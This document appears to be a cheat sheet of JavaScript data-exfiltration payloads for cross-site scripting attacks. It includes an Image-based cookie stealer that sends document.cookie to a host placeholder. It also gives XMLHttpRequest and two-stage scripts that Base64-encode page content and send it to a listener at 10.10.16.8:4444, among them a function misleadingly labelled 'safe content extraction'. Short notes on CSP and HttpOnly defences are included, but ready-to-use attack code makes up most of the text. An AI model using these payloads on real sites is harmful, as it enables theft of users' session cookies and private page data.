Data Exfiltration
JavaScript Payloads
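Creates an Image object whose src assignment triggers a GET request carrying the Base64-encoded cookies. Cookies flagged HttpOnly are not exposed through document.cookie, and a Content-Security-Policy img-src restriction blocks image loads from unlisted hosts.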
x = new Image(); x.src ='[HOST]?data='+btoa(document.cookie);
XMLHttpRequest Exfiltration
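Reads the entire page body HTML, Base64-encodes it, and sends it to the attacker in a GET query string. A Content-Security-Policy connect-src restriction blocks XMLHttpRequest connections to unlisted hosts.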
var req=new XMLHttpRequest();
req.open('GET', 'http://10.10.16.8:4444/?tokyo=' + btoa(document.body.innerHTML), true);
req.send();
Two-Stage Exfiltration
First request: Extract specific page element (#admin)
Second request: Send that data to attacker
Extract specific page elements
/**
 * Two-stage example: one XMLHttpRequest reads content, and a second one
 * forwards the Base64-encoded response to an external listener.
 *
 * Takes no parameters and returns nothing; both requests are asynchronous.
 *
 * Defensive notes: the outbound request is governed by the page's
 * Content-Security-Policy connect-src directive, and long Base64 values in
 * query strings sent to an unfamiliar host are a useful signal in proxy logs.
 */
function getElement() {
var req1=new XMLHttpRequest();
// '#admin' is a fragment-only URL. It resolves against the document's base
// URL and the fragment is not sent in the HTTP request, so responseText holds
// the full response for that URL rather than only the #admin element.
req1.open('GET', '#admin' , true); //Swap #admin for your desired element
req1.onreadystatechange = function () {
// Continue only once the first request has completed with HTTP 200.
if (req1.readyState === req1.DONE) {
if (req1.status === 200) {
var req2=new XMLHttpRequest();
// The Base64 text travels in the query string of a GET to another origin.
// NOTE(review): 10.10.16.8 is an RFC 1918 private address, presumably the
// author's lab listener.
req2.open('GET', 'http://10.10.16.8:4444?tokyo=' + btoa(req1.responseText), true);
req2.send();
}
}
};
req1.send();
}
getElement();
Safe Content Extraction with Encoding
Safe content extraction with encoding
/**
 * Requests http://example.com, Base64-encodes the response body, logs it to
 * the console, and POSTs it to an external listener as `tokyo=<base64>`.
 *
 * Takes no parameters and returns nothing; both requests are asynchronous.
 *
 * NOTE(review): Base64 is a reversible encoding, not a protection; the data
 * still leaves the page in recoverable form.
 */
function safeContentGrab() {
var req = new XMLHttpRequest();
// Reading a response from another origin requires that origin to permit it
// through CORS; if the browser rejects the request, onload does not run.
req.open('GET', 'http://example.com', true);
req.onload = function() {
// Only a 200 response is encoded and forwarded.
if (req.status === 200) {
var encodedData = btoa(req.responseText);
console.log('Encoded:', encodedData);
var sendReq = new XMLHttpRequest();
// The outbound POST is subject to the page's Content-Security-Policy
// connect-src directive.
// NOTE(review): 10.10.16.8 is an RFC 1918 private address, presumably the
// author's lab listener.
sendReq.open('POST', 'http://10.10.16.8:4444/', true);
sendReq.send('tokyo=' + encodedData);
}
};
req.send();
}
/**
 * Sets a demonstration cookie and logs whatever document.cookie returns.
 *
 * Only script-readable cookies appear in document.cookie; cookies set with
 * the HttpOnly attribute are not included.
 */
function cookieExample() {
  const demoCookie = "testCookie=exampleValue; SameSite=Lax";
  document.cookie = demoCookie;
  // Read back through the same property so the log reflects what the page sees.
  console.log('All cookies:', document.cookie);
}
safeContentGrab();
cookieExample();